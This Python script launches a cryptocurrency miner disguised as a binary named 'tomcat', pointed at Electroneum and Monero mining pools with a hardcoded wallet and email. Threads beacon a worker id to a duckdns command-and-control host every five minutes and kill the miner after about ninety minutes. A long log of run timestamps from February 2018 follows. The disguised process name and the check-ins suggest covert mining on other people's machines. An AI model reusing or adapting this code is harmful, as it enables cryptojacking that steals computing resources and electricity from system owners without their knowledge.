import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:08.033220
#2018-02-17 17:09:05.616011
#2018-02-17 18:57:01.954305
#2018-02-17 20:45:07.977044
#2018-02-17 22:33:05.181713
#2018-02-18 00:17:01.817447
#2018-02-18 02:08:05.712007
#2018-02-18 03:55:08.334597
#2018-02-18 05:42:03.459022
#2018-02-18 07:34:07.686103
#2018-02-18 09:22:01.702568
#2018-02-18 11:09:04.928047
#2018-02-18 12:56:01.712030
#2018-02-18 14:43:03.776857
#2018-02-18 16:33:05.443744
#2018-02-18 18:22:01.464617
#2018-02-18 20:08:04.988480
#2018-02-18 21:55:01.359531
#2018-02-18 23:44:07.162713
#2018-02-19 01:30:05.994011
#2018-02-19 03:18:04.968886
#2018-02-19 05:03:05.671732
#2018-02-19 06:49:03.898198
#2018-02-19 08:39:03.869431
#2018-02-19 10:28:04.250570
#2018-02-19 12:16:01.756262
#2018-02-19 14:02:01.612610
#2018-02-19 16:33:02.499183
#2018-02-19 18:19:06.757700
#2018-02-19 20:05:08.386594
#2018-02-19 21:56:05.553162
#2018-02-19 23:41:07.444141
#2018-02-20 01:28:01.859706
#2018-02-20 03:16:08.141043
#2018-02-20 05:02:07.864228
#2018-02-20 06:46:03.628285
#2018-02-20 08:33:06.710952
#2018-02-20 10:17:07.906535
#2018-02-20 12:02:05.170047
#2018-02-20 13:48:01.790890
#2018-02-20 15:27:04.293177
#2018-02-20 17:13:11.832585
#2018-02-20 19:03:01.978909
#2018-02-20 20:51:08.077469
#2018-02-20 22:36:06.237623
#2018-02-21 00:16:06.681771
#2018-02-21 02:02:06.730940
#2018-02-21 03:50:07.267725
#2018-02-21 05:33:08.170283
#2018-02-21 07:22:01.506205
#2018-02-21 09:06:06.754365
#2018-02-21 10:55:08.353354
#2018-02-21 12:42:06.010194
#2018-02-21 14:31:04.319364
#2018-02-21 16:17:05.877344
#2018-02-21 18:06:06.537403
#2018-02-21 19:54:06.706549
#2018-02-21 21:42:07.908796
#2018-02-21 23:29:07.171236
#2018-02-22 01:18:02.052868
#2018-02-22 03:06:06.875894
#2018-02-22 04:50:01.496917
#2018-02-22 06:35:07.168106
#2018-02-22 08:23:02.168360
#2018-02-22 10:10:01.919102
#2018-02-22 11:54:12.356846
#2018-02-22 13:41:04.584097
#2018-02-22 15:29:01.484412
#2018-02-22 17:14:10.986665
#2018-02-22 19:01:05.214033
#2018-02-22 20:52:08.040077
#2018-02-22 22:37:01.922718
#2018-02-23 00:24:05.198778
#2018-02-23 03:29:08.092701
#2018-02-23 05:15:07.342637
#2018-02-23 07:02:07.355141
#2018-02-23 08:52:08.591186
#2018-02-23 11:11:02.151463
#2018-02-23 13:06:04.176913
#2018-02-23 14:50:10.536300
#2018-02-23 16:39:02.157197
#2018-02-23 18:24:09.931840
#2018-02-23 20:09:08.677029
#2018-02-23 21:59:07.561362
#2018-02-23 23:48:05.787792
#2018-02-24 01:39:01.812430
#2018-02-24 03:31:03.620535
#2018-02-24 05:16:06.696332
#2018-02-24 07:05:08.293214
#2018-02-24 08:53:04.932932
#2018-02-24 10:54:01.383562
#2018-02-24 12:41:07.520478
#2018-02-24 14:29:04.916618
#2018-02-24 16:17:03.680742
#2018-02-24 18:11:04.144260
#2018-02-24 19:57:02.165198
#2018-02-24 23:26:01.869104
#2018-02-25 03:47:05.066539
#2018-02-25 07:32:05.475500